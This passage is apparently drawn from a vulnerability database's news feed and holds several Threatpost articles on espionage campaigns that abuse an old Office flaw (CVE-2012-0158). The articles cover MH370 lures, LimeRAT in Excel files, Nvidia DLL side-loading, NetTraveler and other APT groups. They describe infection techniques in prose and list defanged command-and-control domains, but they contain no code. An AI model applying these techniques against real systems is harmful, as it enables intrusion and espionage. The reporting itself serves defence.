disappearance of Malaysia Airlines Flight 370 as a lure to infect government officials in the U.S. and Asia-Pacific.\n\nFireEye today published research on a number of [spear phishing attacks](<http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html>) that contained either infected attachments or links to malicious websites. One Chinese group, [admin@338](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>), has been active in the past targeting international financial firms that have expertise in analyzing global economic policies. 
Two days after flight 370 was reported missing, a spear phishing email was sent to government officials in Asia-Pacific, FireEye said, with an attachment referring to the missing airliner.\n\nUsers who clicked on the attachment saw a blank document, while in the background a variant of the Poison Ivy Trojan was installing and eventually established a backdoor to www[.]verizon[.]proxydns[.]com. This group has used both Poison Ivy and this domain in previous attacks, FireEye said.\n\nPoison Ivy has some miles on it, but security researchers say hacker groups, in particular some with ties to China, continue to make use of it. The malware is a remote access Trojan that allows attackers to not only set up backdoor communication with infected machines, but push additional malicious code, steal documents and system information, and pivot internally.\n\nFireEye said it monitored a second attack from the admin@338 group which targeted a \u201cU.S.-based think tank\u201d on March 14. The malicious attachment pretended to be a Flash video related to the missing plane and attached a Flash icon to the executable, researchers said.\n\nThis version of Poison Ivy connected to its command and control at dpmc[.]dynssl[.]com:443 and www[.]dpmc[.]dynssl[.]com:80, FireEye said, adding that the phony Verizon domain used in the first attack also resolved to an IP used by this attack as well.\n\nAdmin@338 is not the only hacker group using the Malaysia tragedy to its advantage. On March 9, a malicious executable disguised as a PDF connected to a command and control server at net[.]googlereader[.]pw:443. 
The victim is shown a phony PDF purporting to be a CNN story about the disappearance of the flight.\n\nThree more samples used either a Word document or an executable disguised with a .DOC extension to drop an exploit for CVE-2012-0158, the MSCOMCTL.OCX flaw also used in the [IceFog](<http://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417>), [NetTraveler](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>) and [Red October APT](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397>) campaigns reported by Kaspersky Lab. All of these attacks behaved similarly, targeting high-value victims and establishing backdoor connections.\n", "cvss3": {}, "published": "2014-03-25T16:04:54", "type": "threatpost", "title": "Malaysia Airlines Flight 370 spear phishing emails spotted", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-03-26T12:21:21", "id": "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "href": "https://threatpost.com/mh-370-related-phishing-attacks-spotted-against-government-targets/105024/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-09T11:23:58", "description": "Researchers have discovered a fresh campaign using Excel files to spread LimeRAT malware \u2013 making use of the hardcoded VelvetSweatshop default password that Excel applies to encrypted files.\n\n[LimeRAT](<https://github.com/NYAN-x-CAT/Lime-RAT>) is a full-featured remote access tool/backdoor that lets attackers access an infected system and install a range of malware strains, such as ransomware, cryptominers, keyloggers or botnet clients.\n\nIn the observed campaign, threat actors are creating read-only Excel files containing a LimeRAT payload. 
Typically in malspam scenarios involving Excel files, the files are encrypted and the recipient would need to use a password to decrypt the file. That password is usually included by an attacker in the body of a socially engineered email.\n\nThe new attack, however, uses a different tack: it sends malicious, encrypted Excel files in \u201cread-only\u201d mode, according to Mimecast Threat Center\u2019s Matthew Gardiner.\n\n\u201cThis campaign is notable because it shows off how cybercriminals are continuing to build on \u2018old\u2019 underlying techniques to deliver exploits, even ones that companies are well aware exist,\u201d Gardiner told Threatpost.\n\nWhen it opens an encrypted Excel file, Excel first tries the embedded default password, \u201cVelvetSweatshop,\u201d to decrypt it. If that succeeds, the file opens in read-only mode without ever prompting for a password, and any onboard macros or other potentially malicious code can run, the researcher explained, writing in a Tuesday [blog post](<https://www.mimecast.com/blog/2020/03/velvetsweatshop-microsoft-excel-spreadsheet-encryption-rises-again-to-deliver-limerat-malware/>) about the research.\n\nOnly if the \u201cVelvetSweatshop\u201d password fails does Excel ask the user for a password. A file encrypted with the default password therefore skips that step entirely, Gardiner said \u2013 and therein lies the new campaign\u2019s threat.\n\n\u201cThe Microsoft Office system will not generate any warning dialogs other than noting the file is read-only,\u201d he wrote in the post. 
\u201cUsing this read-only technique, the attacker can reap the obfuscation benefits of file encryption without requiring anything further from the user, taking away one step required of the intended victim for exploitation to occur.\u201d\n\nThis makes it even easier for unsuspecting victims to open the files and spread the malware.\n\n\u201cThis new research demonstrates that making an Excel file read-only \u2014 as opposed to locking it \u2014 encrypts the file without the need for an external created password to open it, making it easier to fool a victim into installing the malware,\u201d wrote Gardiner.\n\nIn the current campaign, the cybercriminals also used \u201ca blend of other techniques in an attempt to fool anti-malware systems by encrypting the content of the spreadsheet hence hiding the exploit and payload,\u201d Gardiner added.\n\nThe hardcoded password is a long-known behaviour, documented by Sophos and [presented at Virus Bulletin](<https://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/>) in 2013. (The report files it under CVE-2012-0158, but that identifier covers the MSCOMCTL.OCX memory-corruption flaw Microsoft patched in 2012, not Excel\u2019s default-password handling, which has not been changed.) Mimecast said it has notified Microsoft that the behaviour is once again being abused.\n\n\u201cThe VelvetSweatshop technique has developed continuously to be leveraged as an underlying capability for attacks that can be more targeted and more sophisticated, thus making spear-phishing more successful,\u201d Gardiner told Threatpost. \u201cThere does not appear to be a change or fix from Microsoft in the works. In that case, in order to improve defenses against this method, organizations must use more sophisticated anti-malware technology to monitor traffic and train users to be more cyber-aware.\u201d\n\nMicrosoft Office files such as Excel spreadsheets are a popular means of malware delivery due to their widespread use and recognizability, according to Mimecast. 
\u201cCertainly, few are ever surprised to receive invoices or financial spreadsheet attachments via email,\u201d Gardiner wrote.\n\nIt\u2019s unlikely that LimeRAT will be the only payload distributed using this tactic: \u201cOf course, given the general capability inherent with this Excel-based malware delivery technique, any type of malware is a good candidate for delivery, so Mimecast researchers expect to see it used in many more malicious phishing campaigns in the future,\u201d Gardiner observed.\n\nTo avoid being the victim of such an attack, Mimecast recommended close scrutiny of all emails with files attached, as well as, on an administrative level, monitoring network traffic for outbound connections to likely command-and-control (C2) services. Also, continuously updating endpoint security systems to bolster detection of malware loading or running on the host also can mitigate attacks, Mimecast said.\n\nThe danger is of course exacerbated by the [work-from-home (WFH) phenomenon](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>) that\u2019s emerged in the wake of the COVID-19 pandemic.\n\n\u201cWhat\u2019s old is new again, as is the case with this latest campaign leveraging the LimeRAT trojan embedded within Excel files,\u201d Tal Zamir, CTO and co-founder at Hysolate, said in an emailed comment. \u201cThe challenge, however, is that many of us are now working from home; our guard may be down, we may be juggling everything from our jobs to teaching our kids from home, and trying to stay in touch with friends and family during these challenging times. Given this, it\u2019s highly likely that we\u2019re managing the majority of these communications \u2013 email, file sharing, web conferencing, etc. 
\u2014 all from the same laptop \u2014 which is no longer sitting behind our corporate firewalls, IDS/IPS, or other protections that would normally be in place when working from our corporate offices.\u201d\n", "cvss3": {}, "published": "2020-03-31T17:14:38", "type": "threatpost", "title": "8-Year-Old VelvetSweatshop Bug Resurrected in LimeRAT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2020-03-31T17:14:38", "id": "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "href": "https://threatpost.com/velvetsweatshop-bug-resurrected-limerat/154310/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:01:15", "description": "A series of targeted attacks continues to abuse a signed Nvidia application to drop a backdoor that gives attackers control over the systems of Tibetan sympathizers.\n\nAccording to [Sophos\u2019 Gabor Szappanos](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>), the multifaceted attack can install a backdoor on unsuspecting users\u2019 machines to siphon off system information, including the computer\u2019s name and OS version along with other sensitive details.\n\nFirst, the campaign makes use of an old Microsoft Office vulnerability (CVE-2012-0158) that has been [used in multiple exploit vectors over the last six months](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>). 
The vulnerability has most often been delivered through rich text format (RTF) documents and gained notoriety last month when it was announced as one of four exploits used in the Red October campaign.\n\nWhile the vulnerability has been used in the past against Tibetan activists and other Asian military and energy targets, the way the attack leverages an authentic Nvidia tool is interesting.\n\nThe RTF document in this case is an article about the Tibetan Youth Congress that acts as a diversion while three files are dropped onto the system: Nv.exe, NvSmartMax.dll and NvSmartMax.dll.url. Nv.exe is a legitimate, signed executable for Nvidia\u2019s Smart Maximise Helper Host, a tool that helps manage properties for the company\u2019s graphics cards. The DLL is the malicious part of the equation: Nv.exe looks for NvSmartMax.dll in its own directory, so the attackers\u2019 copy is loaded in place of the legitimate library (DLL side-loading). It then decrypts and executes the code stored in NvSmartMax.dll.url, which compromises the computer and grants the attacker a set of remote-access functions; Sophos enumerates them in the write-up linked below.\n\nThe whole campaign is awfully similar to one [used by the remote access tool PlugX, spotted by TrendMicro last September](<http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/>). That attack relied on a different, older Microsoft RTF vulnerability (CVE-2010-3333) but also dropped a handful of Nvidia files, including NvSmartMax.dll, onto systems. 
Much like the most recent attack, in the 2012 attack NvSmartMax.dll boots up a backdoor (boot.ldr) that can open and modify files on the infected system.\n\nSophos has a more detailed explanation of the attack, including its multi-step process, at [Naked Security](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>).\n", "cvss3": {}, "published": "2013-02-27T19:10:44", "type": "threatpost", "title": "Anti-Tibetan Attack Stems from Nvidia Abuse, Old RTF Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-04-17T16:30:37", "id": "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "href": "https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/77570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:15", "description": "When NetTraveler was unveiled in June, Costin Raiu of Kaspersky Lab warned that the espionage campaign was an \u201cugly gorilla with a thousand faces\u201d and that we hadn\u2019t seen them all yet.\n\nA little more than two months later, another profile of the malware targeting activists, diplomats, government targets and the scientific research community has reared its head.\n\nRaiu said today that a variant has been spotted by Kaspersky\u2019s Global Research and Analysis Team and, unlike its first go-round which targeted Microsoft Office vulnerabilities, this new take on [NetTraveler exploits a recently patched Java bug](<http://www.securelist.com/en/blog/208214039/NetTraveler_Is_Back_The_Red_Star_APT_Returns_With_New_Tricks>). 
The group behind the attacks has also jumped on the [watering hole attack](<http://threatpost.com/the-chinese-are-not-going-to-stop/100735>) bandwagon, having compromised an Uyghur-related website and redirecting victims to an attack site.\n\n\u201cWatering hole attacks have become another popular method to attack unsuspecting victims by the APT operators,\u201d Raiu wrote on Securelist, the Kaspersky Lab research blog. \u201cThere is perhaps no surprise that the NetTraveler attacks are now using this method as well.\u201d\n\nNetTraveler has zeroed in on Tibetan and Uyghur activists in addition to a number of manufacturing, research and even military targets. The first version, which [spread via spear phishing emails carrying malicious Office documents](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>), exfiltrated files from victims\u2019 machines and sent them to a command and control infrastructure that overlapped with one used by the Gh0st RAT campaign. Office document files such as Word, Excel and PowerPoint files were uploaded to command and control servers; the malware\u2019s configuration files can also be modified to steal design documents such as Corel Draw or AutoCAD files. 
To date, NetTraveler has infected victims in more than 40 countries, Raiu said.\n\nThe variant reported today also targets the same victim demographics, but has expanded [beyond spear phishing](<http://threatpost.com/nettraveler-attackers-using-nsa-prism-program-as-bait/101006>) to [watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/77647>), which provide attackers with the ability to cast a wider net at potential victims by infecting websites they\u2019re likely to visit with exploits that redirect them to an attacker-controlled site where more malware awaits.\n\nThe updated NetTraveler was spotted in the last week, Raiu said, targeting several Uyghur activists with an email promising a statement from the World Uyghur Congress on a massacre in Karghiliq county. The link to the statement purports to go to the Uyghur Congress website but instead points victims to a NetTraveler domain, weststock[.]org. A Java exploit called new.jar on the page is for a [vulnerability patched in June by Oracle](<http://threatpost.com/oracle-java-patch-update-pushes-2013-totals-past-last-year/101014>), [CVE-2013-2465](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465>), that affects Java 7U21 and earlier, Java 6U45 and earlier and Java 5U45 and earlier. The payload is a backdoor dropper called file.temp used by NetTraveler, compiled on May 30, Raiu said.\n\nOnce up and running on the victim\u2019s machine, the NetTraveler variant connects to a command and control server hosted at Multacom Corp., in Los Angeles; the IP address is 198[.]211[.]18[.]93. 
Raiu said that the command server is still operational and that the host is dedicated to this attack infrastructure.\n\nMeanwhile, the NetTraveler group has also apparently compromised a Uyghur-related website at the Islamic Association of Eastern Turkistan with an iframe attack that redirects victims to the weststock[.]org domain.\n\n\u201cThe usage of the Java exploit for CVE-2013-2465 coupled with the watering hole attacks is a new, previously unseen development for the NetTraveler group,\u201d Raiu said. \u201cIt obviously has a higher success rate than mailing CVE-2012-0158 exploit-ridden documents, which was the favorite attack vector until now. We estimate that more recent exploits will be integrated and used against the group\u2019s targets.\u201d\n\nNeither NetTraveler iteration relied on zero days, Raiu said. The [first version of NetTraveler](<https://www.securelist.com/en/blog/8105>) targeted Office vulnerabilities that had been patched almost a year earlier, yet Kaspersky Lab researchers were still able to find more than 22 gigabytes of stolen data on sinkholed command and control servers, which they believe is only a small fraction of what was taken. 
More than 30 command and control servers have been discovered between the two versions of the campaign.\n", "cvss3": {}, "published": "2013-09-03T09:32:29", "type": "threatpost", "title": "NetTraveler Now Using Java Exploits, Watering Hole Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2013-2465"], "modified": "2013-09-04T21:31:57", "id": "THREATPOST:6E1A424ADE6EAAA732FBE0027DD6F97F", "href": "https://threatpost.com/nettraveler-variant-adds-java-exploits-watering-hole-attacks-to-bag-of-tricks/102156/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-06-17T13:34:15", "description": "Researchers have identified a small yet potent China-linked APT that has flown under the radar for nearly a decade running campaigns against government, education and telecommunication organizations in Southeast Asia and Australia.\n\nResearchers [from SentinelLabs said](<https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/>) the APT, which they dubbed Aoqin Dragon, has been operating since at least 2013. The APT is \u201ca small Chinese-speaking team with potential association to [an APT called] UNC94,\u201d they reported.\n\nResearchers say one of Aoqin Dragon\u2019s techniques is the use of pornography-themed malicious documents as bait to entice victims to open them.\n\n\u201cAoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,\u201d researchers wrote.\n\n## **Aoqin Dragon\u2019s Evolving Stealth Tactics**\n\nPart of what\u2019s helped Aoqin Dragon stay under the radar for so long is that they\u2019ve evolved. 
For example, the means the APT uses to infect target computers has changed over time.\n\nIn their first few years of operation, Aoqin Dragon relied on exploiting old vulnerabilities \u2013 specifically, CVE-2012-0158 and CVE-2010-3333 \u2013 which their targets might not have yet patched.\n\nLater, Aoqin Dragon created executable files with desktop icons that made them look like Windows folders or antivirus software. These programs were actually malicious droppers which planted backdoors and then established connections back to the attackers\u2019 command-and-control (C2) servers.\n\nSince 2018, the group has been using a fake removable device as its infection vector. When a user clicks to open what seems to be a removable device folder, they in fact initiate a chain that downloads a backdoor to their machine and opens a C2 connection. Not only that, the malware copies itself to any actual removable devices connected to the host machine, in order to continue its spread beyond the host and, hopefully, into the target\u2019s broader network.\n\nThe group has employed other techniques to stay off the radar. They\u2019ve used DNS tunneling \u2013 manipulating the internet\u2019s domain name system to sneak data past firewalls. One backdoor the group leverages, known as Mongall, encrypts communication data between host and C2 server. Over time, the researchers said, the APT kept refining the fake removable disc technique; this was done to \u201cupgrade the malware to protect it from being detected and removed by security products.\u201d\n\n## **Nation-State Links**\n\nTargets have tended to fall in just a few buckets \u2013 government, education and telecoms, all in and around Southeast Asia. 
Researchers assert \u201cthe targeting of Aoqin Dragon closely aligns with the Chinese government\u2019s political interests.\u201d\n\nFurther evidence of Chinese involvement includes a debug log found by researchers that contains simplified Chinese characters.\n\nMost important of all, the researchers highlighted an overlapping attack on the president of Myanmar\u2019s website back in 2014. In that case, police traced the hackers\u2019 command-and-control and mail servers to Beijing. Aoqin Dragon\u2019s two primary backdoors \u201chave overlapping C2 infrastructure,\u201d with that case, \u201cand most of the C2 servers can be attributed to Chinese-speaking users.\u201d\n\nStill, \u201cproperly identifying and tracking State and State Sponsored threat actors can be challenging,\u201d Mike Parkin, senior technical engineer at Vulcan Cyber, wrote in a statement. \u201cSentinelOne releasing the information now on an APT group that has apparently been active for almost a decade, and doesn\u2019t appear in other lists, shows how hard it can be \u2018to be sure\u2019 when you\u2019re identifying a new threat actor.\u201d\n", "cvss3": {}, "published": "2022-06-17T13:34:04", "type": "threatpost", "title": "China-linked APT Flew Under Radar for Decade", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2022-06-17T13:34:04", "id": "THREATPOST:794EAB73A376A35B810DFA241137B6D2", "href": "https://threatpost.com/apt-flew-under-radar-decade/179995/", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-10T12:13:24", "description": "In these days of advanced threats, the perimeter defense strategy \u2013 though still useful and necessary \u2013 is incomplete. IT security teams need as much information about existing threats as possible, so they know what to look for and how to position proactive countermeasures. Creating and using adversary playbooks that dive deep into current threats helps in this endeavor.\n\nRather than focusing on the perimeter mindset of keeping the bad actors out, this new strategy focuses on preventing threat actors from achieving their goals. With this in mind, let\u2019s look at three such playbooks.\n\n## Silence Group Playbook\n\nA cybercriminal organization that targets banks, Silence Group has been actively focused on stealing information used in the payment-card industry since 2016. The group\u2019s aim is to make as much money as possible by compromising targets via a spear-phishing strategy that then leads to exfiltrating financial data, as well as allowing attackers to [\u201cjackpot\u201d ATMs](<https://threatpost.com/atm-jackpotting-malware-winpot/141960/>) to withdraw money.\n\nThe Silence Group repurposes publicly available tools, combined with \u201cliving off the land\u201d techniques [i.e., trusted off-the-shelf and preinstalled system tools to carry out their work]. This strategy has two benefits: locally available tools are less likely to trip detection, and authorized, already-privileged tooling helps them establish a deeper and stronger foothold in targeted systems. In addition, the group also writes its own sets of modular, custom tools.\n\nThe standard threat begins with a spear-phishing email containing malicious attachments. 
These may be in the form of a weaponized Microsoft Word document or a Microsoft Compiled HTML Help (CHM) file sent to banks to entice their employees to click on the attachments.\n\nNext, a VBScript embedded in the help file runs inside the HTML Help viewer\u2019s browser engine, where it de-obfuscates itself and executes a PowerShell command. This PowerShell command calls out to another server to retrieve a binary file, which it then decrypts into a third-stage downloader. This last downloader then acquires the actual Silence Group payload, which consists of several different modules depending on which phase of the overall attack the group is currently in. These modules include a proxy, a monitoring agent, an ATM module and the main Silence module itself.\n\nThe ATM module is used in combination with human \u201cmules\u201d who use codes sent to their mobile devices to jackpot ATM devices \u2013 and then physically transport the cash to a drop-off site.\n\n## Goblin Panda Playbook\n\nFocused on interests in Southeast Asia, Goblin Panda has been active since 2014. Due to non-standardized naming conventions within the industry, Goblin Panda is also referred to as APT 27, Hellsing, Cycldek, and perhaps 1937CN. Its targets and campaigns have been quite specific in nature. Favorite methodologies of Goblin Panda include the use of remote access trojans, including the infamous PlugX/Korplug, NewCore, and Sisfader RAT tools.\n\nThe distribution of infected samples through weaponized Microsoft Office documents is a strategy often used by attackers such as Goblin Panda. 
Recent examples include documents containing malicious macros, or documents that exploit known vulnerabilities, most recently [CVE-2012-0158](<https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/>) and [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>).\n\nTypically, Goblin Panda activity begins with a spear-phishing attack via a maliciously crafted Microsoft Office document. When the document is opened by the victim, a variety of files are dropped into different locations on the victim\u2019s PC. Dropped files include legitimate software vendor files, an encrypted binary blob containing the payload, and DLL files containing a decryptor and loader for the payload.\n\nThe attack also uses a DLL hijacking technique to evade traditional antivirus detection during the installation of the malware: a malicious DLL is dropped under the name of a legitimate library that one of the dropped vendor executables loads, so the trusted binary runs the attackers\u2019 code. Finally, it also checks whether it is running in a VM environment. Once it is finished with those tasks, it sends various parameters to a C2 server. If those parameters are deemed okay, it then downloads a payload. In most recent cases, that payload has been the NewCore RAT malicious DLL file.\n\n## Playbook Preview: Zegost\n\nAn infostealer originating in China that has been active since 2011, Zegost is also known as Zusy or Kris. Zegost has recently undergone a variety of upgrades, including the ability to use a PowerShell command, triggered the moment a victim\u2019s mouse moves over a specific piece of text in a document, to download its infostealer payload.\n\nIt has also added the ability to clear the host\u2019s event logs to provide long-term evasion capabilities, granting it more time to move laterally across the victim\u2019s network. 
A previous update went so far as to enable it to use COM programming, an uncommon feature in malware.\n\nZegost\u2019s main objective is to amass information about the victim\u2019s device and exfiltrate it. Zegost will hunt for OS versions, analyze the speed and quantity of processors in the victim\u2019s machine, check for an internet connection and look for the RDP port number.\n\nZegost is uniquely configured among infostealers to remain under the radar, making it far more of a long-term threat compared to its contemporaries. The malware accomplishes this by evading runtime conflicts; it creates a mutex, which it checks to ensure only a single version of itself is running.\n\nZegost is currently deployed as the foundation of a spear-phishing campaign against a Chinese governmental entity. The motives for this campaign are currently unclear. While Zegost hosting infrastructure is based mainly in China, third-level domains for the infostealer have been observed outside of the country.\n\n## Going by the Book\n\nThreat actors are a determined and innovative lot, creating schemes within schemes to get what they want. Attackers only have to be right once however \u2013 while IT security teams are charged with covering all possible attack vectors. That\u2019s why adversary playbooks can be tremendously helpful for defensive learning.\n\nIn addition, they can play a critical role for law enforcement in identifying trends and strategies and fingerprinting common practices used by specific cybercriminal organizations. Deep analysis of threat techniques can be used to construct effective defenses. 
As more vendors share what they have learned with the larger industry, and create trusted partnerships even between competitors, as is the case with the [Cyber Threat Alliance](<https://www.cyberthreatalliance.org/>), everyone benefits as a whole.\n\n**_Derek Manky is chief of Security Insights & Global Threat Alliances at Fortinet \u2013 Office of CISO_**\n\n**_Please check out all of the latest posts in our [Infosec Insider Community](<https://threatpost.com/microsite/infosec-insiders-community/>)._**\n", "cvss3": {}, "published": "2019-08-28T14:47:51", "type": "threatpost", "title": "Defense Takeaways from Three Adversary Playbooks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882"], "modified": "2019-08-28T14:47:51", "id": "THREATPOST:E068C231265847BA99669A8EBF0D395D", "href": "https://threatpost.com/defense-takeaways-three-adversary-playbooks/147771/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:04", "description": "Don\u2019t judge an APT by its exploits alone. That\u2019s the takeaway from a report that details a unique advanced persistent threat that leverages a kludge of unsophisticated, outdated and rudimentary attack tools to conduct cyber espionage. The target of the attacks are government and diplomatic agencies in Asia with close ties to China.\n\nResearchers discovered the APT group, dubbed [Dropping Elephant](<https://securelist.com/blog/research/75328/the-dropping-elephant-actor/>), and report that it was active between November 2015 and this June. 
The APT, discovered by researchers at Kaspersky Lab and outlined in a report released today, relies exclusively on social engineering and low-budget malware tools and outdated exploits against old, patched Windows vulnerabilities.\n\nThe group, according to the report, chooses targets mainly in Asia, paying particular attention to Chinese government and diplomatic organizations \u2013 and also to foreign embassies and diplomatic offices in China, including those of Pakistan, Sri-Lanka, Uruguay, Bangladesh, Taiwan, Australia and USA, according to the report.\n\n\u201cDespite using such simple and affordable tools and exploits, the team seems capable of retrieving valuable intelligence information,\u201d said Vitaly Kamluk, director of Kaspersky Lab\u2019s APAC Global Research and Analysis Team.\n\nThe Dropping Elephant\u2019s ragtag approach included standard attack schemes starting with two-stage phishing email attack. Phase one involves sending email with a harmless attachment that when opened pinged the attacker\u2019s command and control server with details pertaining to the target\u2019s computer. The second stage included sending an email with either Microsoft Word or PowerPoint document that contained exploits (CVE-2012-0158 and CVE-2014-6352) effective on unpatched versions of Microsoft Office.\n\nIn other cases, according to Kaspersky Lab, the APT attacker also relied heavily on social engineering to reach desired targets. \u201cSome victims are targeted by a watering hole attack: they receive a link to a website disguised as a political news portal, focused on China\u2019s external affairs,\u201d according to Kaspersky Lab. Links lead to additional content that included Microsoft PowerPoint files that contained malicious payloads.\n\n\u201cThe content of the malicious PPS is based on carefully chosen, genuine news articles featuring widely discussed geopolitical topics, which makes the document look more trustworthy and likely to be opened. 
This leads many users to become infected,\u201d according to Kaspersky Lab.\n\nOnce the payloads are executed, attackers place a UPX (a free and open source executable packer) file with an AutoIT executable on targeted systems, according to Kaspersky Lab. The AutoIT then automates the downloads of additional components from the attackers\u2019 servers. \u201cThen the stealing of documents and data begins,\u201d Kaspersky Lab wrote in its report.\n\nA closer look at the Dropping Elephant APT\u2019s use of the AutoIT executable revealed an AutoIT3 script embedded inside. \u201cOnce started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user\u2019s Google Chrome credentials,\u201d according to the report.\n\nAnother file-stealer module, for example, downloaded malware that repeatedly attempted to go through directories and collect files (doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, and pdf) and then upload them to the command and control server.\n\nAccording to researchers, Dropping Elephant managed to pull off attacks with what Kaspersky Lab calls \u201clow investment and ready-made offensive toolsets,\u201d coupled with high-quality social engineering lures. Social engineering also included maintaining Google+, Facebook and Twitter accounts.\n\nResearchers can\u2019t say with 100 percent certainty that the attackers were of Indian origin. However, there are indicators: the APT attackers used the Indian language, were active during the Indian workday, and IP addresses used in the attack were traced to India.\n\nKaspersky Lab said it doesn\u2019t believe that the cyber-espionage attacks will end anytime soon. Researchers say there are indications that the APT group is increasing its headcount, based on the fact that the group\u2019s active hours have expanded.\n\n\u201cThe modus operandi of \u2018Dropping Elephant\u2019 could hardly be called sophisticated. 
The attackers rely heavily on social engineering and low-budget malware tools and exploits. However, this approach seems to be effective, which makes this actor a dangerous one,\u201d Kaspersky Lab wrote.\n", "cvss3": {}, "published": "2016-07-08T11:04:30", "type": "threatpost", "title": "'Dropping Elephant' APT Attackers Targets Old Windows Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2014-6352"], "modified": "2016-07-08T15:04:30", "id": "THREATPOST:4F07A726C1A5FB6D0CE8EDF605517CA0", "href": "https://threatpost.com/dropping-elephant-apt-targets-old-windows-flaws/119123/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:42", "description": "A new cyberespionage malware campaign with ties to China going back to the Titan Rain and Gh0stNet attacks has been targeting diplomats, military contractors and government agencies in 40 countries.\n\nResearchers at Kaspersky Lab today unveiled details on [NetTraveler](<http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims>), a data exfiltration tool, which has infected more than 350 high profile victims using primarily exploits targeting two patched Microsoft vulnerabilities. Costin Raiu, senior security researcher and head of the Global Research and Analysis Team, told attendees today at the 2013 Cybersecurity Forum in Washington, D.C., that one backdoor used in the NetTraveler campaign was probably written by the same developers responsible for Gh0st RAT. In fact, Raiu said, the same group of 50 or so developers could be behind a number of similar espionage attacks dating back close to a decade.\n\n\u201cThere is a very common misconception that all these attacks are separate. In reality all these operations are connected to each other,\u201d Raiu said. 
\u201cThe NetTraveler attacks are loosely connected with the Gh0stNet attacks, which are loosely connected with Titan Rain.\n\n\u201cThey\u2019re just one big ugly gorilla with a thousand faces and of course we haven\u2019t seen all of them yet,\u201d Raiu said.\n\nIn addition to diplomats and government targets, NetTraveler samples were found to be targeting Tibetan and Uyghur activists, oil production facilities, scientific research outfits, universities and private companies. The tool is capable of extracting system information, drop keylogging malware, steal Office documents such as Word, Excel and PowerPoint files, and its configuration can be modified if necessary to steal Corel Draw designs, AutoCAD files and other file types used in manufacturing and defense circles. The files are then compressed and encoded via custom protocols that resemble BASE64 code and sent to a command and control server via HTTP.\n\nThe attacker\u2019s IP operation ranges, the Kaspersky report said, overlap with that of a malware family known as Zegost, or the Gh0st remote access Trojan; one of the Zegost command and control servers was still active as of a few weeks ago. They\u2019re also used to distribute the Saker, a backdoor module used to steal system information that shares export functions via two DLLs named JustTempFun and ServiceMain. Those DLL names are also found in Gh0st RAT, the Kaspersky researchers said.\n\nSome of the victims targeted by NetTraveler, meanwhile, are also victims of Red October. However, Kaspersky has not connected the attackers in these two campaigns.\n\n\u201cAlthough we see no direct links between the NetTraveler attackers and the Red October threat actor, the existence of victims infected by both of these campaigns is interesting. 
